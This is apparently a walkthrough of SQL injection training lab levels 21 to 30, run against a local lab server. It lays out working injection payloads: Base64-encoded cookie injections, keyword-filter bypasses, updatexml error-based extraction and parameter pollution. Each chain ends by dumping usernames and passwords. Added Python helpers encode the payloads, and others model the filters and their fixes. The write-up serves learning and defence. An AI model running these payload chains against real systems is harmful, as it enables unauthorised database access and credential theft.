Less-21
1. Log in with admin / 123456 and capture the request in Burp Suite.
2. Send the request to Repeater. Appending ' to the cookie value triggers a SQL error; the closing turns out to be ') #.
   The cookie is Base64-encoded, so every payload below is encoded before it is sent: select it, right-click -> Convert selection -> Base64 -> Base64-encode.
3. Column count (order by 4 fails, order by 3 succeeds, so the query returns three columns):
') order by 4 # => Jykgb3JkZXIgYnkgNCAj
') order by 3 # => Jykgb3JkZXIgYnkgMyAj
4. Find the echoed columns:
') union select 1,2,3 # => JykgdW5pb24gc2VsZWN0IDEsMiwzICM=
5. Database name:
') union select 1,2,database() # => JykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpICM=
6. Table names:
') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' # => JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknICM=
7. Column names of the users table:
') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' # => JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSwzIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgYW5kIHRhYmxlX25hbWU9J3VzZXJzJyAj
8. Dump every row of the table:
') union select 1,2,group_concat(id,username,password) from users # => JykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQoaWQsdXNlcm5hbWUscGFzc3dvcmQpIGZyb20gdXNlcnMgIw==
Less-22
1. Log in with admin / 123456 and capture the request in Burp Suite.
2. Appending ' to the cookie value triggers an error; here the closing is " #.
   As in Less-21, every payload is Base64-encoded before sending: select it, right-click -> Convert selection -> Base64 -> Base64-encode.
3. Column count:
" order by 4 # => IiBvcmRlciBieSA0ICM=
" order by 3 # => IiBvcmRlciBieSAzICM=
4. Find the echoed columns:
" union select 1,2,3 # => IiB1bmlvbiBzZWxlY3QgMSwyLDMgIw==
5. Database name:
" union select 1,2,database() # => IiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkgIw==
6. Table names:
" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' # => IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgIw==
7. Column names:
" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' # => IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQoY29sdW1uX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5JyBhbmQgdGFibGVfbmFtZT0ndXNlcnMnICM=
8. Dump every row of the table:
" union select 1,2,group_concat(id,username,password) from users # => IiB1bmlvbiBzZWxlY3QgMSwyLGdyb3VwX2NvbmNhdChpZCx1c2VybmFtZSxwYXNzd29yZCkgZnJvbSB1c2VycyAj
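The Burp encoding step above is easy to get wrong by hand (a stray space or missing # changes the whole value), so here is an added Python helper, not part of the original write-up, that produces the same Base64 cookie values for the Less-21 and Less-22 discovery chains from the two closing prefixes. The cookie name uname is an assumption; use whatever name the lab actually sets.

```python
import base64

# Added example, not from the write-up. Rebuilds the Base64 cookie values that
# Burp's "Convert selection -> Base64 -> Base64-encode" produced above.

PREFIX_LESS21 = "') "   # Less-21: the cookie sits inside ('...'), so ') closes it
PREFIX_LESS22 = '" '    # Less-22: the cookie sits inside "...", so " closes it

# The discovery chain used in both levels. Each fragment ends with " #" so the
# remainder of the server's original query is commented out.
CHAIN = [
    ("order_by_4",  "order by 4 #"),
    ("order_by_3",  "order by 3 #"),
    ("union_probe", "union select 1,2,3 #"),
    ("db_name",     "union select 1,2,database() #"),
    ("tables",      "union select 1,group_concat(table_name),3 from information_schema.tables "
                    "where table_schema='security' #"),
    ("columns",     "union select 1,group_concat(column_name),3 from information_schema.columns "
                    "where table_schema='security' and table_name='users' #"),
    ("dump",        "union select 1,2,group_concat(id,username,password) from users #"),
]


def encode_cookie(prefix: str, fragment: str) -> str:
    """Base64 (standard alphabet, padded) of prefix + fragment, as the server expects."""
    return base64.b64encode((prefix + fragment).encode()).decode()


def decode_cookie(value: str) -> str:
    """Inverse of encode_cookie: what the server sees after base64_decode()."""
    return base64.b64decode(value).decode()


def build_chain(prefix: str) -> dict:
    """All steps of the chain for one closing style, keyed by step name."""
    return {step: encode_cookie(prefix, fragment) for step, fragment in CHAIN}


def cookie_header(prefix: str, fragment: str, name: str = "uname") -> str:
    """A ready-to-paste Cookie header line (cookie name is an assumption)."""
    return f"Cookie: {name}={encode_cookie(prefix, fragment)}"


if __name__ == "__main__":
    for level, prefix in (("Less-21", PREFIX_LESS21), ("Less-22", PREFIX_LESS22)):
        print(level)
        for step, value in build_chain(prefix).items():
            print(f"  {step:12s} {value}")
```

One caveat when pasting these: PHP URL-decodes cookie values, so if an encoded payload happens to contain + or /, percent-encode it (%2B, %2F) in the header or the server will decode a corrupted string. None of the values above contain either character, which is why the raw Burp output worked.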
Less-23
1. ?id=1 --+ and ?id=1 # both still return data: the lab strips --+ and # from the input, so neither comment style can be used to cut off the rest of the query.
2. Closing: ?id=1' and ' 1 ' =' 1 (the injected trailing ' 1 is completed by the original query's own closing quote, so no comment is needed).
3. Find the echoed columns:
http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,2,3%20and%20%27%201%20%27%20=%27%201
4. Database name
5. Table names:
http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20and%20%27%201%20%27%20=%27%201
6. Column names:
http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20and%20%27%201%20%27%20=%27%201
Less-24
1. Register a new user.
2. Log in -> change the password.
The change succeeds.
Less-25
1. The page states that or and and are filtered. Union-based injection still works with the closing id=1' --+; the filtered words are double-written (infoorrmation_schema, anandd) so that after the filter removes one occurrence the intended word remains.
2. Find the echoed columns:
http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,2,3%20--+
3. Database name:
http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,database(),3%20--+
4. Table names:
http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27%20--+
5. Column names:
http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27%20--+
6. Dump all data
Less-26
1. Closing: when closing with 1' and ', it turns out that comment characters and whitespace are filtered as well as or/and. Double-write or/and or replace them with && and ||, and use parentheses instead of spaces. With no comment available, each payload re-opens the quote at the end (||') and the data is read out of the updatexml() error message.
2. Database name:
?id=1'||(updatexml(1,concat(1,(select(database()))),1))||'
3. Table names:
?id=1'||(updatexml(1,concat(1,(select(group_concat(table_name)) from (infoorrmation_schema.tables)where(table_schema='security'))),1))||'
4. Column names of the users table:
?id=1'||(updatexml(1,concat(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security'aandnd(table_name='users')))),1))||'
5. Everything in the users table (password is double-written as passwoorrd because it contains or):
?id=1'||(updatexml(1,concat(1,(select(group_concat(passwoorrd,username))from(users))),1))||'
Less-27
1. This level filters whitespace, union and select. The keyword filter is case-sensitive, so mixed case (sElect) gets past it; a tab (%09) replaces the space. As in Less-26 the payload ends with and' to re-close the quote and the result is read from the updatexml() error.
2. Database name:
?id=1'and%09updatexml(1,concat(1,(sElect%09database())),1)and'
3. Tables in the database:
?id=1'and%09updatexml(1,concat(1,(sElect%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema='security')),1)and'
4. Columns of the users table:
?id=1'and%09updatexml(1,concat(1,(sElect%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_schema='security'%09and%09table_name='users')),1)and'
5. All fields of the users table:
?id=1'and%09updatexml(1,concat(1,(sElect%09group_concat(username,password)%09from%09users)),1)and'
Less-28
1. This level filters whitespace and the sequence union select. A newline (%0A) replaces the space, and union select is double-written (uniunion%0Aselecton%0Aselect) so that removing one union<whitespace>select leaves a valid one behind. The closing here is ') and the query is re-closed with ('1 at the end.
2. Table names:
?id=99')uniunion%0Aselecton%0Aselect%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema='security'and ('1
3. Column names of the users table:
?id=99')uniunion%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand('1
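Every bypass from Less-23 through Less-28 relies on the same defect: the blacklist deletes each pattern in one pass and then trusts the result. The following Python model is an added example, not the lab's code; its rule lists are written from memory of the lab's preg_replace() chains and should be treated as an assumption. It lets you check offline whether a candidate payload survives a given level's filter, and shows the two hardened variants (re-run until stable, or refuse anything the filter would change) that make double-writing useless.

```python
import re

# Added example, not the lab's own code. Models the single-pass strip filters
# of Less-23 and Less-25 to Less-28 (rule lists are an assumption) and contrasts
# them with filters that are not fooled by double-written keywords.


def strip_once(rules, value):
    """Apply each (regex, flags) rule once, in order, like a chain of preg_replace()."""
    for pattern, flags in rules:
        value = re.sub(pattern, "", value, flags=flags)
    return value


OR_AND     = [(r"or", re.I), (r"and", re.I)]
COMMENTS   = [(r"[/*]", 0), (r"-", 0), (r"#", 0)]      # /*  --  #
SPACE_PLUS = [(r"[ +]", 0)]                             # space and +, not tab or newline
KEYWORDS   = [(re.escape(k), 0)                         # exact-case list, so sElect survives
              for k in ("select", "union", "SELECT", "UNION", "Select", "Union")]


def filter_less23(v): return strip_once([(r"#", 0), (r"--", 0)], v)
def filter_less25(v): return strip_once(OR_AND, v)
def filter_less26(v): return strip_once(OR_AND + COMMENTS + [(r"\s", 0), (r"[/\\]", 0)], v)
def filter_less27(v): return strip_once(COMMENTS + SPACE_PLUS + KEYWORDS, v)
def filter_less28(v): return strip_once(COMMENTS + SPACE_PLUS + [(r"union\s+select", re.I)], v)


def strip_to_fixpoint(filt, v):
    """Hardened variant 1: re-run the filter until nothing changes.
    Defeats double-writing, but still silently mangles legitimate input."""
    while (nxt := filt(v)) != v:
        v = nxt
    return v


def is_clean(filt, v):
    """Hardened variant 2: reject instead of sanitise. If the filter would
    alter the value at all, refuse the request rather than guess what was meant."""
    return filt(v) == v


if __name__ == "__main__":
    # Payloads taken from the write-up above, run through their level's filter.
    samples = [
        (filter_less25, "infoorrmation_schema"),
        (filter_less25, "anandd"),
        (filter_less26, "passwoorrd"),
        (filter_less27, "sElect\tdatabase()"),
        (filter_less28, "uniunion\nselecton\nselect"),
    ]
    for filt, payload in samples:
        print(f"{filt.__name__}: {payload!r} -> {filt(payload)!r} "
              f"| fixpoint {strip_to_fixpoint(filt, payload)!r} | clean={is_clean(filt, payload)}")
```

A side effect worth knowing: the Less-26 model also explains why the spaces in the page's step 3 payload (select(...) from (infoorrmation_schema.tables)where(...)) do no harm; the filter's own whitespace rule deletes them, leaving the parenthesised form. Neither hardened variant is the real fix: the query should take id as a bound parameter, and the blacklist models exist only to show why stripping is the wrong primitive.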
Less-29
1. The parameter is checked to be numeric, but the check reads only the first id value. Sending two id parameters, the first a plain number and the second carrying the injection, passes the check while the backend query uses the second one.
2. Database name:
?id=1&id=-1'union select 1,database(),3 --+
3. Table names:
?id=1&id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
4. Column names of the users table:
?id=1&id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
5. All fields of the users table:
?id=1&id=-1'union select 1,2,group_concat(id,username,password) from users --+
Less-30
1. Same as Less-29: the numeric check reads only the first id value, so the first id is a normal number and the second carries the injection. The only difference is that the parameter is closed with a double quote.
2. Database name:
?id=1&id=-1"union select 1,database(),3 --+
3. Table names:
?id=1&id=-1"union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
4. Column names of the users table:
?id=1&id=-1"union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
5. All fields of the users table:
?id=1&id=-1"union select 1,2,group_concat(id,username,password) from users --+
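The Less-29/30 trick is HTTP parameter pollution: the component doing the numeric check and the component building the query disagree about which of two id values is "the" value. The Python below is an added example, not the lab's code; it models the behaviour the write-up describes (first value checked, last value used, as PHP's $_GET does for a repeated key) and shows the check that closes the gap. The function names and the exact query template are assumptions.

```python
from urllib.parse import parse_qs

# Added example, not from the write-up. Models the parameter-pollution gap of
# Less-29/30: a front-end check that reads id[0] and a backend that reads id[-1].

PAYLOAD_29 = "id=1&id=-1'union select 1,database(),3 --+"
PAYLOAD_30 = 'id=1&id=-1"union select 1,database(),3 --+'


def id_values(query: str) -> list:
    """Every value sent for id, in order, with + decoded to a space (so --+ becomes '-- ')."""
    return parse_qs(query, keep_blank_values=True).get("id", [])


def waf_allows(query: str) -> bool:
    """Model of the lab's check: validates only the FIRST id value."""
    values = id_values(query)
    return bool(values) and values[0].isdigit()


def php_get(query: str) -> dict:
    """PHP-style $_GET: for a repeated key the LAST value wins."""
    return {k: v[-1] for k, v in parse_qs(query, keep_blank_values=True).items()}


def backend_sql(query: str, quote: str = "'") -> str:
    """The statement the backend ends up running; Less-29 quotes id with ' and Less-30 with "."""
    return f"SELECT * FROM users WHERE id={quote}{php_get(query)['id']}{quote} LIMIT 0,1"


def hardened_allows(query: str) -> bool:
    """Fix: refuse a repeated key outright and validate the single value that remains.
    Checking every value (all(v.isdigit() ...)) would also work, but a duplicate id is
    never legitimate here, so rejecting it is simpler and removes the parser ambiguity."""
    values = id_values(query)
    return len(values) == 1 and values[0].isdigit()


if __name__ == "__main__":
    for label, payload, quote in (("Less-29", PAYLOAD_29, "'"), ("Less-30", PAYLOAD_30, '"')):
        print(label)
        print("  check passes :", waf_allows(payload))
        print("  backend runs :", backend_sql(payload, quote))
        print("  hardened     :", hardened_allows(payload))
```

The same disagreement shows up between real components, not just in the lab: different servers and frameworks pick the first, the last, or all values for a duplicated key, so any validation layer that sits in front of another parser has to either reject duplicates or validate every value it sees.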